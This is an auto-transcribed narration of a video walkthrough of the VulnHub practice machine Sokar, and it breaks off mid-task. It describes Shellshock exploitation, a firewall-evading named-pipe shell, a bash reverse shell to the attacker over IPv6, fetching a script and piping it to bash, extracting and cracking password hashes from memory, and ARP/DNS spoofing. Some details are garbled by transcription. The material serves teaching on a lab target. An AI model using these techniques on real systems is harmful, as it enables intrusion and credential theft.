What's going on, YouTube? This is ippSec, and we'll be doing Sokar from VulnHub. That's right, we're doing a VulnHub machine, not Hack the Box, because Hack the Box didn't retire a machine due to Fortress and Endgame. This box was created back in 2015 by Rastamouse, the same guy that created Rasta Labs just last year, which is an amazing lab. And I didn't actually do this box in 2015. The whole reason I decided to pick it is because I was looking through VulnHub for a machine that looked like it would be a good quality one, and as soon as I saw his name, I decided he would not let me down. This box has a bunch of vulnerabilities from like 2014, 2015, if you can't tell from the word cloud, and we're also going to be doing a lot of new things to those. For instance, the firewall evasion technique I'm showing off, I haven't really seen anyone else do. It's kind of on Pentest Monkey as a forward shell and done a different method that requires Apache to have HTTP protocol options unsafe set, which you're not really going to find. And I'm also going to be using BetterCap 2, which is a very new man-in-the-middle framework that is freaking amazing. So let's just jump in. Because this is VulnHub, everything is local. We don't know the IP address of Sokar yet. So in order to find the IP address, I'm going to run an ifconfig to see my local network device, which is eth0. Then I'm going to do netdiscover-i eth0. And while I run that, I'm going to go and start up the VM. And I don't have many VMware things running on my network, so the very first thing that responds as VMware is most likely going to be Sokar. We can see I have Ubiquity, Action Tech, more Ubiquity, and Asus Tech, and then a VMware thing pops up almost right after I start it up at 172.16.10.138. This is Sokar, so let's do a Masscan against this. And I'm doing Masscan because Sokar is local to me. I'm not going over a VPN like I do in Hack the Box. So I can do I have a lot more throughput to the box. So I can do Masscan, which is going to be very quick. So we'll do -P1 do 65,535 to cover all TCP ports. Then we can do --rate is equal to 10,000. This is going to be 10,000 packets per second. So we should cover the whole TCP range in about 7 seconds. We can do -OG to output in greppable format. And I would throw this in the, I don't have an Nmap directory. I'll just say Masscan. And then the IP address of Sokar, which is 172.16.10.138. We can see it running, and it's at 57%. Nothing's found yet. There we go. One port has been found. And because I did the output greppable format, I'm guessing it's not displaying to standard out, which is a bit annoying. But we'll just look at that output once the scan finishes. Cat mass scan, and we can see port 591 is open. To give you an idea how fast that was, let us run a nmap -p- to do all ports. We can do -T5 to make this as quick as possible, -N to not do DNS to speed it up a little bit, and then do 172.16.10.138. We have to give Nmap a little bit of time to get a estimation, but I'm guessing probably around 10 to 15 minutes. So we see ETA right now at 12 minutes. So Nmap is much lower than Masscan, but it is much safer to do over a network, I guess you can say. And also be aware with Masscan, you can crash devices. I have taken many switches offline by just sending way too many packets at it at once. So we'll make a directory called nmap, and then we'll do nmap -p591 because we know this port is open. We'll say -sc for default scripts, sv for enumerate versions, oa for output all formats, and we'll just put p591 as the label of the file. 172.16.10.138 is the IP address. And once this finishes, it shouldn't take too long because it's only one port. We do see it is Apache HTTPD 2215 CentOS. And 2215, I believe, is CentOS 6. We can just do a quick Google of RHEL for Red Hat Enterprise Linux, HTTPD versions. Check out this first result. And RHEL is Red Hat Enterprise Linux. The reason I'm choosing Red Hat and not CentOS is because Red Hat is essentially a paid version of CentOS, or CentOS is the free version of Red Hat, I should say. And because you pay for Red Hat, you get a lot better documentation. So that's generally why I search that. And we see Red Hat Enterprise Linux. 5 is based off of 223, 6, 2215, and 7, 246. So since we see 225 on Apache, 2215 on Apache, I'm going to guess that this is CentOS 6. Not a huge thing to know, but can be helpful if we're trying to mimic things. It is going over HTTP, so let's go check out what is listening. 172.16.10, 138, port 591. And we see a page, and this looks like a lot of bash commands. We have, looks like date, netstat, maybe uname, iostat. So let's look at what happens when we go to this page. So let's turn a proxy on, intercept set to on, refresh. We see we get slash, and then we also do a get on /CGI bin/cat. And that is what is displaying this page. If we looked at the page source, we can also see there's an iframe /CGI bin/cat, and that is why we're going to the page. So let's just check out /CGI bin/cat, and we just go to a CGI script. The very first thing I do whenever I see a CGI script is test out Shellshock, because 9 times out of 10 in a CTF, if you're doing a CGI, it is going to be Shellshock. And if you want to know more about Shellshock, just search ippSec Shellshock on YouTube, and I'm sure videos will come up. If they don't, check out Beep. That's the one I know. And I think Sokar I also do Shellshock on. So let's intercept this request just to make our life easy instead of going to the History tab. We can send this to a repeater, and let's see if I can do this off memory. Let's see, user agent. We're going to want to do open and close parentheses, then curly brace, colon, semicolon. Then we need to echo a content type, text HTML. Then we need to echo, then we can echo vulnerable. And if we see vulnerable, we know it is vulnerable to Shellshock. And we do see it being vulnerable. I wonder if that I screwed up there. I don't know. But we got code execution. If we do a hostname, this probably will not execute, actually. It doesn't, because hostname isn't part of bash, and we don't have a path yet. So if we do echo path, we get nothing. And the reason echo works, if we do help and look at all the commands built into bash, I think echo is one of them. Yes, echo is right here. So we don't need a path to run echo. We could run any of these commands, like even test, source, times, whatever. So any of these commands we should be able to run. If we want to fix our path, let's just echo path on our Kali box. Let's get rid of that line break. We can export path is equal to path, then do hostname. And now we just get Sokar. So now we have the path defined, so we can run anything we want. So we could try to do a reverse shell. So let's do NC 172.16.10. I am 168 over, let's say, port 80. And we don't get any response back. So it looks like there is a firewall blocking us. So what we can do is create a little Python script to execute Shellshock and give us a nice little shell. So that's what we're going to do. I'm going to make a directory called code, just say organize, and we'll do HTTP, we'll call it Shocker. So what we'll have to do is import requests. And what else do we need to import? I'm going to import, I think all we need is a request. So in order for this to work, we need to set a header. So we'll set headers is equal to user-agent, and then Shellshock. So let's, and we'll have everything static coded first, just to make sure it works, and then we will add it so we can run any command we want. That should be good. Okay. And then we need to run a request. So request.get HTTP 172.16.10.138 /CGI bin /cat, and that, and we also have to do headers is equal to headers, and we want .text. We also want to print this. We want to print the response. So we'll see if this works. And this is Python 3. And maybe not. Doesn't look like it's going. So let's see. Let's add timeout is equal to 5. Oh, port 591. And there we go. We have a Python script that does Shellshock, but it's not really that beneficial because, well, we're not executing any commands. So let's create a loop, and this can be a infinite loop, so it'll go until we kill the program. Let's put headers into that loop. Oh man, this is all messed up. Okay, that should be fine. And headers, we need to say %s for a string, and this variable will be called cmd. And then we'll do cmd is equal to input, and we'll use that as to trigger. Okay. And let's see if this works. Python Shocker, Python 3 Shocker, ls, cat, who am I, Apache, ls-la. So we do have a nice shell. Let us just add a strip to the end of this, so we get rid of that annoying line break. And what is it? I screwed something up. .text. Let's see. That doesn't look right. Hey, but it is right. Okay. So we do have everything working. It looks like there is a file. That was weird. PWD gives me a lot of stuff. I don't know why that's happening. ls. PWD. Weird. So we're in var www CGI bin, and I guess PWD just doesn't kill the Apache request, and this is what's on CGI bin. So let's, yeah, that's what's happening. I wonder if I do PWD echo. I don't know why some commands break the page and some don't. So like ls, it only returns cat. So we can go back into a repeater tab, and hostname only returns Sokar. But PWD returns the PWD, then content type X text HTML. I don't think that's ours. Don't change me, bro. So we'll see if content type changes. And if it doesn't, this is part of the server. So, yeah. Our script is right up here. Content type equals don't change me, bro. And then we have the output of a script, and then the server goes. So something weird is going on when we execute ls that breaks output from the server, and for some reason PWD doesn't. Not sure why. But the one annoying thing about this shell is every single request is a new request. So we're in ver www CGI bin. If I do cd ... pwd again, I'm back there. Every single request is starting up a new shell. So I'm going to do something to fix that. And this is something I figured out doing Sans Net Wars, actually. Because a lot of people in that, during the attack and defend, set up firewalls to block the same packets out, so it's really hard to do a reverse shell. So this trick gets around that, and you can do a full shell over HTTP that is persistent and keeps all your commands. And you also can make yourself have a TTY, so you can do kernel exploits and things like that. So this is a really cool trick that I haven't really seen anyone else pull off. So to start this off, I'm going to explain exactly what's happening. It's a lot like this pentest monkey thing. So if we do pentest monkey reverse shell, this is how I had figured it out. Let's see. And when we think about how this is working, it's just creating a name pipe to accept commands, and then piping commands into the name pipe, and then doing an output to a netcat socket. Instead, we're just going to output to an actual file, and then read the file and write to another file. Sounds complicated, but we'll do this real quick, and maybe it'll make sense. So I'm going to do mkfifo to make FIFO to do a named pipe. At least I think that's the terminology. And then we can do /temp I. We'll do temp input to make it a bit easier. So we have a name pipe for temp input. Then we're going to do tail-f on temp input and say for every line, send that over to bin.sh, direct standard error to standard out, and then output the results to /temp output. Super simple, right? And it's going to hang my terminal, but we can just, I want this pane. So if we cat /temp output, we don't see anything. If we echo who am I into temp input, and then cat temp output, we see the results of the command. We can echo pwd into temp input, cat temp output, we see my directory. And the cool thing is, if I echo cd ... and cat output, let's just do cd root documents VulnHub Sokar. See if that works. And then we will echo pwd and then cat output. So there we are. We actually did make a change directory, and it's saved, which is super awesome. And then if you really wanted to, we could do, let's see if I can get this right the first time, python-c, import pty, pty.spawn, then sh. It's always a pain to work with all these quotes. Cat temp out. And now we just see that one hash, and that's because we have executed bin.sh, and we have a TTY in that session. So if we did, I should have showed this before, but now if we do passwd to temp input, and then cat temp output, we have entered new Unix password, and we can actually change the password, but I don't feel like doing that and telling you all my root password, so let us just kill this off. ps-ef grep temp in, kill-96507. And that killed the pane and everything else. So that is what we're going to be doing. And I can remove those files. Temp, input, output. So let's go back into our code, and we'll copy Shellshock to shellshock.tty.py. And this is where it's going to get a little bit complicated. So shellshock.tty.py, and we're going to create actual functions to do everything. So define run cmd. This is going to run our command cmd, and we will set headers. Let's equal that to cmd. Let's see. So I'm going to import a few things real quick. I'm going to import time. We're going to import from base64 import b64 encode. Going to import, let's see, we'll do from random import rand range. And then one thing I always do when I do these things is from IPython core debugger import tracer, and we'll set breakpoint is equal to tracer. And what this does, it's actually really cool. And I can just do breakpoint now and call this. And then when I run the script and it gets to that part in the code, it should drop me into a shell. Let's see. Oh, it's probably waiting for my input. None. Huh, I'm not sure exactly what's hanging up. I don't think it likes that while true loop. Maybe I shouldn't have done this. Or it may just take long to run. We'll give it a few seconds. Oh, there we go. So when I do, let's say we were on ls, I dropped into IPDB, which is the Python debugger. It tells me where I'm at. So if I wanted to, I could say print headers and start examining the code. So that is a super helpful thing. While true. 1, 2, 3, 4. Do this. This back up here. Kill the breakpoint. And until I need that, we'll leave that commented out. So one thing I am going to do, because sending things to files and all that stuff, I like to make sure everything is base64 encoded, because I don't feel like dealing with random issues with quotes and whatnot. So let's see. After echo path, we can do echo %s base64-d and pipe that to sh. So all we're doing is echoing the base64 we send through the HTTP request, decoding it, and then sending it over to sh to be executed. Then we can have result is equal to this. Request. Have an extra parenthesis, I think. Nope, that was the right number. No, it wasn't, because that terminates that. Yep. And then we can return result. So let's just test this out real quick. So run cmd who am I. Oh, we need a base64 encode this. That's what imported B64 encode. So let's say run cmd who am I. Then up here we can have cmd equals cmd.encode. We have to put this into a UTF-8 format. And then we can do cmd equals b64 encode, cmd. Should be right. I think I'm missing something. Oh, we have to decode it from UTF when we pass it to bash. I hate how Python 3 makes us do everything in binary format. I can show you what happens if we don't do this UTF-8 stuff. So, do this. Probably get an error. So, byte-like object is required, not string, and we're erroring on line 9 in run command. If we do :9, we can see this is the line. So, if I have this encoded, I can do that base 64, and then we can remove the encoding, so it's just ASCII text, which makes it friendly to send through boot. So Python shocker dty ls. Oh, we're not in Python 3. That's why that errored. When I did just input, it's expecting Python commands and Python 2. But in Python 3, input is not like that. So we didn't get any response back because I am not printing the results of this. So print run cmd. I have .text strip there, so we just need run cmd who am I. There we go. So back to having same thing we were, just we have this function. And this is going to help because now we can create a few things. So we can do another one called setup shell, and we can say std in and std out. And before we do this, we have to define a few variables. So this is where we want random. So we already imported from random import rand range. So let's set up a few things. Session is equal to rand range. We'll say 1000 to 9999. And we also need to set two things. Not the smartest thing to do, but I don't feel like passing these two variables every single time. So let's just get rid of that in setup shell. So doing this global command lets us just refer to standard in and out in these functions when they're not in the functions, because these are going to be static variables, never changing. So dev shm, that's the RAM disk, input dot %s, and this is going to be session. Do the same thing for out. And the reason I did random numbers at the end of this is because I assume I'm going to run the script multiple times, and funky things happen when the files already exist and you don't delete them. So I like just picking a random one, and this should be enough where we don't have repeats. So setup shell we can now start doing and say named pipes is equal to, and I'm just going to do 3 quotes because when we do this, I can show real quick, Python 3, we can say print, and then do 3 quotes, echo, a single quote, this, and just do a bunch of random special characters, do another 3 quotes, And we can see we don't have to worry about escaping anything. So that's why I have those 3 quotes there. We will say this is going to be mkfifo. We need %s. Then we need tail-f %s. Bin sh 2 and 1. 2 %s again. We don't need a semicolon at the end of that. And let's define those %s's. So standard in, we make the file, we tail the file at standard in as well, and then we have standard out. So the next thing we do is we want to do run cmd, and the command we want to run is named pipes. And I don't think we have to do anything else here. So we can just return none. And then, let's see, we also need another command that will be called def write cmd. And let's just copy this, so that looks like 6 lines? 7 lines. Whoops. And change this a little bit. So instead of going over to sh, we just want to write this into %s, which will be std out. Okay. And then we can define, I guess, a read command, because we have to read the output. So this will be pretty much the same exact thing as named pipes, except a command is going to be read. We can just call this, I don't think I've used output before, output, and this will be bin cat on %s, and %s is going to be standard out. Run command. We'll call this get output. And this will return output. I think that may be it. I'm trying to think what we're doing wrong. Yeah, let's run this and see if we can figure out if it works. Oh, while true, print run command, so we have to do a few things here. We have to say setup shell, call that. Then we can do while true, cmd is input, and we can say write cmd, cmd plus \n to add a line break. And then after that runs, we can print, what is it? Read command. And hope for the best, I guess. There's no way it's going to work first try. Never does. What did I screw up? Request timed out. Port 591. Oh! This mkfifo never actually finishes. So we can do try and accept none. Take 5 seconds for that to time out, and then we should get this prompt, And let's do hostname. A read command missing one thing, requires CMD. Shouldn't, because all we're doing is catting a static file. Give it 5 seconds. Hostname. Just echoed hostname. I think I screwed up where I'm writing to. Who am I? Yeah, that's a funny bug. Let's see. Standard in is input. Standard out's there. Setup shell. Write command. Then we're printing read. Read is getting standard out. Run command. Where's write command writing to? Write command is writing to standard out. That shouldn't be there. Standard in. Think. Let's see. Echo. That's CMD. And that is where it's going to. No, that should be standard out. No, write command is standard in. Ugh. Should have with my gut. Hostname. There we go. So now if we do pwd, we get var www CGI bin cd dot dot pwd. We're in var www. Because we're not clearing out the file after each time, we're getting a bunch of history every time we run a command. So let us fix that. So we can do, we have read, write, we have a run command. So let's see. Let's just say clear output is equal to echo nothing to standard out. And we can do run CMD, standard out, and that may fix the issue we were having. Give this 5 seconds. pwd, okay, cd dot dot, pwd, did not fix it. Let's see. Oh, run command standard out, that makes no sense. Clear output. It is hard to talk and code at the same time, or talk and do anything. Should really take that timeout a bit lower. ls typo clear. Here's the typo. If you can't tell, this is going to be a very long video, because after this I want to do something else. And we cleared the output at the wrong spot. We cleared it before reading it. There we go. And we have a shell, and we do pwd, CGI bin. Now we're in var www, var. So we're in a really good spot right now. We can do if config, get the output of that. If we try Python C, I don't think this is going to work. Import pty, pty.spawn, bin bash. We'll see if it does. ls. Oh, it does. Sweet. So we see the bash prompt, ls, and the bash prompt again. But that's just because of how the Python TTY works. But now we could do, let's say, pass WD. We'll do SU dash. They're going to prompt us for password. So we're only reading once. So let us fix this. And this is where the code is going to get really tricky. It's going to get tricky because we're going to do threading in Python, because the issue is we run the command and we only check output once. I want to check output every single second. So in order to do that, we have to create a thread that runs in the background and just checks it every single second. So in order to do that, we have to import threading, and I just said that a lot in order to do that way too much. So I'll try to calm down on that. And we have to create a class. So we'll do class all the reads. We'll pass it an object. And we'll say when it initializes, interval equals 1. Forgot the semicolon. Self.interval. Interval. Then we need to say thread is equal to threading.thread equals self run args equal. Yep. Then we can say thread.daemon is true. This is what puts it in the background. And thread.start. Okay, so all we're doing here, this passing an object just means when I call all the threads, I could say, hey, interval equals 4, and then that will change this variable. And then self.interval equals interval. Interval is just getting defined within this class, and that is going to be the number of seconds we call read. Then this is just defining the thread. This runs a thread in the background, and this says, hey, when the thread initializes, start. Then we can say define run, because when I define the thread up here, I said, hey, threading is equal to self.run. So self is this class, and then I'm defining run. And we want to do, let's see, where's read it command? We're going to grab this and paste it in here. Okay, and then let's call read output. I don't know if I actually have to put this here because I already did it in one spot, but we'll do it here to be safe. S. So we need to both be able to read and clear the output. While true, and we can say output is equal to run cmd read output. Then if output, this is saying if output is not nothing, then, and nothing means there's like it's blank. Run cmd clear output, and we can print output, then tell this to go to sleep for interval. I wonder if I have to say self.interval. We'll see if it errors out. And then these are definitions. So in order to start this, we can just do, we'll do it after setup shell. How do I start it? What do I call it? All the reads. So we'll just call this reading the things is equal to all the reads. Loop read std out file. And we can get rid of this, get rid of this, say time.sleep, and we'll say 1.1. hopefully this works. I made a lot of code changes, so I don't expect it to first time. Come on. ls. Oh, it does. Find slash. Yep, it does. So now when we do python-c import pty, pty.spawn, then bash, we do, what was it? I try to do su, and it asks me for the password. I can put anything, and it's not going to let me in. So now I have a real TTY. I can't do tab autocomplete and that stuff. If I really wanted to, I could do things like import read line and fix it that way. But for now, I am perfectly happy with how my script is working. So I actually didn't want that TTY, so we'll kill the code, run it again. And I just didn't want it because I don't like having that bash thing. We could have something filter it echoing itself out, but I don't feel like doing that right now. I'll leave that for you guys. So we're on the box, and what I want to do is see exactly why my reverse shell didn't work, because there should be a firewall rule, and unfortunately I'm Apache, so I don't have permission to enumerate the firewall. But we can go to etc sysconfig, I think, and ls grep IPTable. There we go. And see the files. So if we cat IPTables, we get no response, and that's because we just don't have permission to read it. So I'm going to do ls-la, grep for IPTables to prove that. And we do have root owns it, and it's read-write only by root. The one thing we want to check is ls-la grep on tables, because there's also IP6 tables. And we can't read to that either, but there's something here. If you can spot it real quick, that'll be awesome. But if not, the thing I notice is IP6 tables was written on November 12th, and IPTables was written on January 2nd. So IP6 tables is much older, 2014 and 2015. So it doesn't look like this was configured. It also goes on to say the last version of IP6 tables, ip6tables.old, 481, and the current size is 41, as the same exact date. So I really doubt IP6 tables was configured. And when we look at IP tables, we have iptables.old at November 12th, and then IPTables at January 2nd. So chances are we can probably use IP version 6 to get off this box. And I would highly recommend looking at the sneaky video if you want to learn more about IPv6, because I do probably a 15 to 20 minute boot camp of IPv6 for pen testers in that video. So let's do ifconfig nc lvnp. We'll do 80 again. And here we will do, I wonder if netcat has a -6 option. I don't know if it does. We'll find out. But we have to do ifconfig. It is eth0. So nc, copy my fe80 address. Because this is a link local, I'll have to specify %eth0 to tell this to go out interface eth0. And then we'll do 80. I'm pretty sure it's -6 for IPv6, but we'll find out. Don't get anything. So let's go here. Oh, I didn't mean to kill that. nc-h. Huh. I thought there was a -6. Let's see. Shell commands. I wonder if I can't get to it on port 80. I should have tested this out. Is there interface -I? Gonna do nc-h here. Do we have NC? We do have NC. Local port. Let's test out curl. Curl, HTTP, my FE80 address, ETH0. And we don't get to it. Let's copy this. Paste. Code doesn't like that in IPv6. Let's try netcat. NC ETH080. -6. Invalid option. -H. Don't see anything there. Grab 6. Okay. Ncat has a 6 option. So if we do ncat 6, connection fused. Let's change this to ncat -6 LVNP 80. Okay, so ncat version 6 is working. Let's listen on 80. Then we can do curl HTTP. Let's do curl here. Curl 0. What was that error? Oh, curl's treating the semicolons as ports. So let's put the address in brackets till it's IPv6. And I just created a new pane. Whoops. Okay, so we got IPv6 working. That was a bit more of a pain than I thought it would be. So now we can do we have ncat? Which ncat? We do not. Echo test to dev TCP. Copy this. Port 80. Hey, it works. So we have a way to get a reverse shell. If I just remembered how to do this one, that would be awesome. I think we just pipe bash to that. Bash-i pipe? No. Let's go to Pentest Monkey again. That is one of the very first ones. Bash-i. So bash-i, then $and paste. Was it 0 and 1? Yep. See if this works. And we get a shell here. So there is a way to get a reverse shell through IPv6 if you wanted to. And we can also scan it over IPv6, but I don't believe SSH is listening at all. So let's do nmap-6, do -p22 because that's the port we'd want. See if we can SSH to it, and it is closed. So let's see, what else can we do? We've enumerated the whatchamacallit, firewall. I guess the next step is a PrivEsc. So IPv6 is actually going to be really helpful here because we're going to be downloading files, and We can't download files over IPv4, but we can download over IPv6. So, awesome. CD, was it Linux? Enum. There we go. I wonder if Python-m simple HTTP server supports IPv6. Guess we'll find out. We want to curl HTTP lin enum.sh and pipe that to bash. And really hope for the best here. I don't know if that listens. Oh, we don't have port 80. Copy and paste this. See if this ends up running. Didn't get any hits. Let's see. Curl. Let's not pipe that. Fail to connect. Port 80 refused. So Python simple HTTP server is not IPv6 capable, maybe. I wonder if I specify loop back. If we specify this. I should have prepared more for IPv6 for this box. I didn't do as much prep as I should have, I guess. Oh well. 0? I bet Python 3 is going to save us. Pip3 install. Is that how we get this? Wait, I'm overthinking something. Service HTTPD start. Apache 2 start. www HTML. Let's clear that. Okay. So what can we do? We're going to copy opt. Linux PrivEsc. I have two linenum.sh stuff here. I have a num and Linux underscore PrivEsc. That's funny. So now, can we curl this? And we can. Awesome. Copy, paste. And it didn't come back. tail-ever log Apache access. Let's try this again. Let's just copy my exact curl command. Didn't hit us. Let's renew our shell just in case we did something to kill it. I wonder if this version of curl doesn't have IPv6 support. Could have swore we hit it. Six tables -L. Nothing's blocking it. netcat lvnp-6 81. Try this curl again on port 81 just to make sure it works. Okay, I don't think curl has IPv6, so let us just get a reverse shell and or get a normal reverse shell and copy and paste with VI. So get rid of my Python TTY by just going to this. And we can change that to port 81. Did not change to port 81, I don't think. Change to port 1. 81. Get the reverse shell. Now Python C import pty, pty.spawn, and bash. And we're back in a much more familiar territory. So we can also do stty raw minus echo foreground, and now we'll speed up a lot. So, okay, let's go to opt enum base64 lenynum.sh. Is it -w0 for wrapping? It is. That is a big script. We can probably just pipe that to xclip. Xclip dash clipboard. What is it? Xclip dash h. Xclip dash selection clipboard. Okay. So now that should be in my clipboard. We can go back to our netcat dev shm. We can see all our files we've created, but vim len enum.txt sh b64 vi len enum sh b64. Thought it was my clipboard. There we go. base64-d len enum.sh, and run it. Okay, so let's take a look at what we have. Kernel CentOS 6.4, so we're right, it is CentOS 6. Have a few users logged on. Root, Bynarr, Apophis. Oh, I think there's a Stargate box. That's epasswd, more users, home directories. Cron jobs look normal. That looks normal. TCP. We can see a reverse shell. UDP. 68. Something's listening. I forget what port 68 UDP is. Let's see. All this process we don't care about. DH client. Cron. HTTP. Bunch of reverse shells. Len enum. Install Apache. Files. I wonder if we can write to var www. That could be an easy way to exfil stuff. Applications. NFS. config files, and I wonder if anything's in mail. So I went there just because I saw 777 at the end. You can look at this. And we have Bynarr is read, write, read, write, read. So we can look into Bynarr's mail. Subject. Dear Bynarr, welcome to Sokar Inc. Forensic Development Team. We created you a user. Password is fruity. Should require you've been granted outbound on ephemeral port access 51242. So if we didn't have a reverse shell, we could SU as Bynarr and probably call back to a machine on this port. So if we do, or first, let's just test something. We can get rid of that shell. NCLVNP 51242. SU dash Bynarr fruit. Oh, I don't want to do that yet. Bad password. Exit. So we are Apache NC 172.1610.168 51242. We can see I cannot get there as the Apache user. NC 172.1610.168 51242. We can get there as Bynarr. So IPTables is configured in a way to be dependent upon the actual user, which is pretty cool. So we see we're in a group called Forensics. And if we look at our home directory, we have something called Lime, which is a Linux memory thing. It's owned by root. If we do sudo-l, we see that Bynarr may be able to run the commands. And up here, these are environment variables that will get passed during a sudo, I believe. Let's see. Environment keep. Let's see. Colors, display, hostname, his size. We can just try hostname. So it's saying it's keeping those environment variables. So if we say sudo home Bynarr lime, executes the program, but if we set Shellshock to any of those variables, we'll do hostname is equal to binsh. That should do it. Let's see. ID and we're root. Box has been done now. That is a shortcut. But if we want to do this the correct way, it will be executing lime. And we can look at what lime is. I think this is just a bash wrapper. Yeah. Behind running this. So we're going to, let's see, Linux memory extractor. We're going to be copying something to temp RAM and then removing it. So let's run this. Let's see. Nope. Sudo home Bynarr lime. Add or remove. We want to add. And if we go to now temp, there is a RAM file. If we du-h it, it is 256 megs. We can do strings on it. And eventually we get some interesting information. So let's do strings and grep for $0 to $6. And we get some entries out of Shadow, it looks like, potentially. we got some hashes here. A lot of duplicate hashes. There's one, and there is two. And this one looks a little bit long. Do we have any other that's like Zemp? We do not. I wonder if that ends at that period. See, I wonder if there's a better way to do this. We can cat users. Let's see. SWD, grep-a, apo-phis, temp ram. Do we get anything else? This one looks more promising, because we get the start and end. Okay. Let's go here. This is SHA-512, I believe. $6. And let's grep for root. I do root semicolon, or colon, not semicolon, X. Then in quotes. Guessing it's this. Let's see if this is the same length. Yep, same length. So that's the root, and that's a purpose, or however you say his name. Okay. So now the next step is go to the Kraken. We'll do that. This window. Hashcat is right there. Sweet. We want to do hashes, and we'll call this Sokar. Okay. Then we just want to run hashcat. Help grep -I SHA 512 crypt. There we go. Mode 1800. And if you don't know what hash you are, I would highly recommend Googling hashcat example hashes. And then on this page, you have what it looks like and the example, which is really helpful because, let's see, Cisco, ASA, and PIX are very similar, and one of these requires username. I think that is part of the username or something. But seeing these small things on how a hashcat expects it is tremendously helpful. So here's our SHA-512 crypt, and it's $6. So hashcat 1800. Word list comes first, then not word list, hash list comes first, then word list, and we'll just do rocku.text. It's SHA-512, so if it's crackable, it's probably not going to be too hard to crack, so we won't do any rule sets. And while that's going, we can find a way to get this to a box. So temp RAM. Is that where it's stored? Yeah. What is stats? Huh. Dub HTML doesn't exist. CGI. Cat. Less cat. There's a source. Okay, so it's catting temp stats, and that's how it gets data. Can we write to dub? Owned by root, only writable by root. And same thing for all the directories. Oh, that was fast. Recovered 2 out of 2. I bet one of those is fruity. Let's see. Get rid of this. Oh yeah, it says fruity right here. So we got overdrive and fruity. I didn't grab root's hash, I guess. But we don't have to worry about copying the file to the web server. What I was going to do is copy the RAM disk to the web server so I can try to download it, and then maybe use something like volatility or binwalk to see if we can extract anything. But it looks like Hashcat has everything we need, so let's go back to our shell, which is this guy, and we can probably su to, what's his name? Su to apo phis, overdrive, and we are now a different user. So cd build, what's in here? That's a file. Cat build, file build. It's an elf. Don't know what that's doing. ls-la has a set UID bit set. What's this do? Let's YOLO that. Cloning into Mountain Secret Project. Could not resolve Sokar-dev. Fatal. Whatnot. So it looks like it tries to do something to resolve Sokar-dev. So if we cat etc host, it's not there. ls-la etc host. Only ownable and writable by root. ls-la on etc resolve. And we can see we can write to it. And this file is to specify DNS servers. So we could just set a name server to a Kali box and then force a resolve, but I feel like that's cheating a little bit. So what we're going to do is man in the middle of this box, because we're on the same local subnet. Both Sokar and my Kali box are bridged, so we should be able to man the middle. And to do that, we're going to use a tool called BetterCap. Before we do that, we're going to show the old tool Ettercap. We can see IRP-A and 172.16.10.1 is going to this MAC address, which is my ubiquity switch, I believe. If you go back to the very beginning of the video, do a NetDiscover, that'll probably say ubiquity. It's either ubiquity or pfSense. I'm guessing ubiquity. So we can do, let's see, Ettercap-tqm up remote, and then the IP address I want is what is it? Poison 172.16.10.138, and I do 2 slashes because this is IPv6. And group 2, we want to say, hey, we want to intercept all communication to your gateway. So we can see it's automatically pulled the MAC address of group 1, which is our Kali box, and group 2, which is the gateway. And if I do IRP-A again, we have an entry for my Kali box, and we have an entry for the gateway. So if I had opened up Wireshark, so I can just open it this way. Can I? Wireshark. Exit. Wireshark. Now it's going to open up 3 Wiresharks, and that's going to be bad. Come on. Yep. Okay. So to prove what we're doing, I don't think I have promiscuous mode enabled on my vSwitch, so this should be fine. If I set for ICMP, and on Sokar, we're going to ping 8888. And because I'm man-in-the-milling this connection, I should be able to see it. Operation not permitted. We'd have to take down IP tables. Wait. Can we do UDP? Did I just never check UDP? NC-U 8888 53, I think is DNS. UDP. TCP port, UDP port 53. I don't think that went out. Maybe this won't work. Oh, I bet build probably jumps as root and then gets out through the firewall. That's probably why that works. I bet if we do /build, we can see the DNS request. So if we kill this Ettercap, up-A, this MAC address has been resolved. Let's stop and restart this. And we shouldn't see that packet anymore when we do /build. Yes. And we do not, because we are not man-in-the-middling. But Ettercap is old, no longer under development, and very slow. The new hotness is a tool called BetterCap. And we're going to download and install it, and hopefully it installs fine. BetterCap 2. Let's see. And I want to say Ettercap is Ruby. Let's see. Is Ettercap Ruby or is BetterCap 1 Ruby? Ettercap file, user bin. Oh no, that's compiled. But BetterCap 2. This is the hotness. Is it bettercap.com? Maybe bettercap.ninja. .ninja sounds like a hacker domain. Nope. BetterCap. .org. There we go. So we do go get GitHub BetterCap /BetterCap. Let's see if this works. It probably won't. Should go over to the doc. And let's see. Pre-compiled version is available. Let's see. Still thinking. We need libpcapdev and libnetfilterqdev. So we'll see if we have those. No package libnet qfilter found, so we'll apt install this package. Box is a little out of date, but I will pause this video and we will resume once this has been completely installed. So libnet qfilter has been installed. Let us try to do this go get again. And I think it installed. Let's see. Root go bin BetterCap. Hey, it did install. Sweet. So, no output if it installs. Let us run that again. And this is an actual console. If we type help, we can see everything there. We can turn event stream off if we don't want to keep seeing those streams come across. Surprised I'm not seeing more, but anyways. We can see all the options it has by default. The two we will want to use is erp.spoof and probably, let's see, dns.spoof. DHCP6.spoof is another really good one, but we're just going to focus on erp and DNS. So to look at this, we can do help erp.spoof, and we know we can set targets and whatnot. And I'm going to get rid of that event stream real quick. So we just do events.stream off, and now we won't get these updates anymore. So let's set erp.spoof.targets. So if you do help again, you can see the commands. You can set, you can read, you can get. So we want to do set on erp.spoof.targets. So erp.spoof.targets, and then default is the entire subnet. We're going to just do one machine. So 172.16.10.138. And then we can do erp.spoof on. And then if we go over to our box, erp-a, hopefully we will spoof this guy. If config eth0. My Mac ends in FAA4. Oh, it's already done. So if we run that /build again, haven't changed Marshak, let's see. And that's probably, yeah. So we can do and IP source is equal to 172.16.10.138. I think that's this guy. Yep. Run build. Yes. And we see the DNS request go through. So if we want those to go to our Kali box, what do you think we do? We just go to help dns.spoof. We can spoof domains and addresses. So let's go back here. It wants to resolve Sokar dev. So we're going to do set DNS spoof domains Sokar dev, and then we can set DNS spoof address to be ourselves 172.16.10 and 168. We could probably leave it to default, and it would probably be smart to choose eth0, but I don't like leaving to default. So then we can do DNS spoof on. We can set event streams on as well to see what's going on. Events.stream on. If we do help, we see erp.spoof, DNS spoof, and Recon are running. We could also just type active, and it shows only the active things. So we have event stream active, then erp-spoof target is active, and we can see the actual arguments or config. So if we go back here, We can do, let's look at Wireshark real quick at this DNS request. If we, let's see the source and destination for 8.8.8. Let's see what happens when we run that again. Build, yes. Source and destination is still there. Maybe it's just rewriting on the way back. Let's try ping Sokar dev. Unhost. Wonder how we clear ARP cache, or DNS cache. So I'm guessing it's cached right now. Because that should have spoofed it. Let's just set DNS spoof all to true. I think it has to be capital Y. Doesn't exist. Still cannot resolve the host name. Let's see. This should be working. Up-A. It is definitely set that way. Huh. Let's see. Is there anything we can do? Is strace on the box? It is not. 